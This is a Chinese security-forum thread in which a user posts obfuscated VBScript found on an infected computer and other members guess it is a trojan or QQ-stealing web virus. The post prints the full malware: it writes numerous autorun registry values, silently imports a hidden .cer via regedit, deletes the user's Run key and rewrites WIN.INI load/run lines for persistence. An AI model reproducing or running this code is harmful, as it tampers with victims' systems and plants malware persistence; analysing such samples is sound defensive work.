|
 | 作者: tyjhw [tyjhw]
 论坛用户 |
登录 |
| Set sss = CreateObject("WSc" + "ript.Sh" + "ell") mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\" mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\" mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\" sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer" sss.RegWrite ""&mhk&"internat.exe","internat.exe" sss.RegWrite ""&mhk&"zwupdows","12" sss.RegWrite ""&mhk&"win","12" sss.RegWrite ""&mhk&"mwin","12" sss.RegWrite ""&mhk&"internt","12" sss.RegWrite ""&mhk&"Inernet","12" sss.RegWrite ""&mhk&"Internet","12" sss.RegWrite ""&mhk&"iexpleror","12" sss.RegWrite ""&mhk&"zxdows","12" sss.RegWrite ""&mhk&"qwe","12" sss.RegWrite ""&mhk&"win1","12" sss.RegWrite ""&mhk&"intelnat.exe","12" sss.RegWrite ""&mhk&"u1888","12" sss.RegWrite ""&mhk&"intenet","12" sss.RegWrite ""&mhk&"9i5zxdows","12" sss.RegWrite ""&mhk&"9i5com01zxdows","12" sss.RegWrite ""&mhk&"99zxdows","12" sss.RegWrite ""&mhk&"88zxdows","12" sss.RegWrite ""&mhk&"Start Pagewin","12" sss.RegWrite ""&mhk&"Start Page","12" sss.RegWrite ""&mhk&"u188","12" sss.RegWrite ""&mhk&"9i5comzxdows","12" sss.RegWrite ""&mhk&"9q5zxdows","12" sss.RegWrite ""&mhk&"u1881","12" sss.RegWrite ""&mhk&"u1882","12" sss.RegWrite ""&mhk&"u1883","12" sss.RegWrite ""&mhk&"u1884","12" sss.RegWrite ""&mhk&"u1885","12" sss.RegWrite ""&mhk&"u1886","12" sss.RegWrite ""&mhk&"u1887","12" sss.RegWrite ""&mhk&"u88y", "12" sss.RegWrite ""&mhk&"flash", "12" sss.RegWrite ""&mhk&"999izxdows","12" sss.RegWrite ""&mhk&"033zxdows","12" sss.RegWrite ""&mhk&"syste","12" sss.RegWrite ""&mhc&"my","12" sss.RegWrite ""&mhk&"3zxdows","12" sss.RegWrite ""&mhk&"88u88","12" sss.RegWrite ""&mhk&"system","12" sss.RegWrite ""&mhk&"8zxdows","12" sss.RegWrite ""&mhk&"u18","12" sss.RegWrite ""&mhk&"interneet.exe","12" sss.RegWrite ""&mhk2&"RunOnce\", "12" sss.RegWrite ""&mhk&"iexpler", "12" sss.RegWrite ""&mhk&"u1810", "12" sss.RegWrite ""&mhk&"winwin", "12" sss.RegWrite ""&mhk&"WIN32", "12" sss.RegWrite ""&mhk&"W1N32", "12" sss.RegDelete ""&mhc&"" sss.RegDelete ""&mhk&"zwupdows" sss.RegDelete ""&mhk&"win" sss.RegDelete ""&mhk&"mwin" sss.RegDelete ""&mhk&"internt" sss.RegDelete ""&mhk&"inernet" sss.RegDelete ""&mhk&"Internet" sss.RegDelete ""&mhk&"u188" sss.RegDelete ""&mhk&"iexpleror" sss.RegDelete ""&mhk&"zxdows" sss.RegDelete ""&mhk&"qwe" sss.RegDelete ""&mhk&"win1" sss.RegDelete ""&mhk&"intelnat.exe" sss.RegDelete ""&mhk&"intenet" sss.RegDelete ""&mhk&"9i5zxdows" sss.RegDelete ""&mhk&"9i5com01zxdows" sss.RegDelete ""&mhk&"99zxdows" sss.RegDelete ""&mhk&"88zxdows" sss.RegDelete ""&mhk&"Start Pagewin" sss.RegDelete ""&mhk&"Start Page" sss.RegDelete ""&mhk&"9i5comzxdows" sss.RegDelete ""&mhk&"9q5zxdows" sss.RegDelete ""&mhk&"999izxdows" sss.RegDelete ""&mhk&"033zxdows" sss.RegDelete ""&mhk&"u1881" sss.RegDelete ""&mhk&"u1882" sss.RegDelete ""&mhk&"u1883" sss.RegDelete ""&mhk&"u1884" sss.RegDelete ""&mhk&"u1885" sss.RegDelete ""&mhk&"u1886" sss.RegDelete ""&mhk&"u1887" sss.RegDelete ""&mhk&"u88y" sss.RegDelete ""&mhk&"flash" sss.RegDelete ""&mhk&"88u88" sss.RegDelete ""&mhk&"interneet.exe" sss.RegDelete ""&mhk&"u18" sss.RegDelete ""&mhk&"u1888" sss.RegDelete ""&mhk&"system" sss.RegDelete ""&mhk&"3zxdows" sss.RegDelete ""&mhk&"8zxdows" sss.RegDelete ""&mhk&"syste" sss.RegDelete ""&mhk2&"RunOnce\" sss.RegDelete ""&mhk&"iexpler" sss.RegDelete ""&mhk&"u1810" sss.RegDelete ""&mhk&"winwin" sss.RegDelete ""&mhk&"WIN32" sss.RegDelete ""&mhk&"W1N32" Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject") myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI") if myfile14 then set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI") mywin=FSO2.ReadALL() l=Instr(mywin,"run=")-3 m=Instr(mywin,"load=")-1 n=Instr(mywin,"NullPort=")-3 FSO2.close if l>0 and m>0 and l>m then set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI") mywin2=FSO3.Read(l) FSO3.close set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI") mywin3=FSO4.Read(m) FSO4.close if n>0 and n>l then set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI") mywin4=FSO5.Read(n) FSO5.close mywin=Replace(mywin,mywin4,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.WriteLine "load=" FSO2.Write "run=" FSO2.Write mywin FSO2.close else mywin=Replace(mywin,mywin2,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.Write "load=" FSO2.Write mywin FSO2.close end if end if end if 好象是个盗qq的 |
| 地主 发表时间: 11/12 18:36 |
| 回复: tyjhw [tyjhw] 论坛用户 |
登录 |
|
没人知道吗 |
| B1层 发表时间: 11/13 16:33 |
 | 回复: zhangyun [zhangyun]  论坛用户 |
登录 |
|
看天书啊・!!!!!!!!!! |
| B2层 发表时间: 11/13 22:30 |
 | 回复: flyfalcon [flyfalcon]  |
登录 |
|
好像是VBS代码,写进注册表的 |
| B3层 发表时间: 11/14 12:57 |
 | 回复: fsfsfsaf [fsfsfsaf] 论坛用户 |
登录 |
|
有什么症状吗?我可以确定是VBS写的,是调用自做的COM |
| B4层 发表时间: 11/16 21:35 |
| 回复: tyjhw [tyjhw] 论坛用户 |
登录 |
|
我第一时间删除了 你说能有什么症状 |
| B5层 发表时间: 12/18 05:46 |
| 回复: yangcheng [yangcheng]  论坛用户 |
登录 |
|
天书! |
| B6层 发表时间: 12/18 10:11 |
 | 回复: ghame [ghame]  论坛用户 |
登录 |
|
这段代码的作用是在你机器的注册表HKEY_LOCAL_MASHINE\MICROSOFT\WINDOWS\CURRENTVEISION\RUN中写入若干值,以实现某些程序的开机自动运行。 然后将你注册表中的HKEY_CURRENT_USER\WINDOWS\CURRENTVEISION\RUN删除。 然后在HKEY_LOCAL_MASHINE\MICROSOFT\WINDOWS\CURRENTVEISION中删除若干个值。 修改完注册表以后开始检测你的WINDOWS文件夹里是否存在WIN.INI文件,如存在就在此文件中找寻RUN、LOAD、NULLPORT三个字段,并修改你原来的这个文件。 [此贴被 ghame(ghame) 在 12月19日19时18分 编辑过] |
| B7层 发表时间: 12/19 19:01 |
 | 回复: yangxius [yangxius] 论坛用户 |
登录 |
|
利用这个程序,往注册表里边写入一些自动运行的值,而且还删除了原来的自动运行的程序,好象是一个木马,大概能够利用QQ打开一个后门。 |
| B8层 发表时间: 12/20 09:37 |
| 回复: zhb7769 [zhb7769] 论坛用户 |
登录 |
你是怎么知道这个病毒的源代码的?我怎么不会,5555555 |
| B9层 发表时间: 12/20 20:59 |
| 回复: leonshoh [leonshoh] 论坛用户 |
登录 |
|
好象是XX的网页病毒,看起来有点老套,没有代码加密~ |
| B10层 发表时间: 03-12-25 11:20 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 编程破解
标题: 我机器上中了个病毒。这是源码大家帮忙看看是什么东西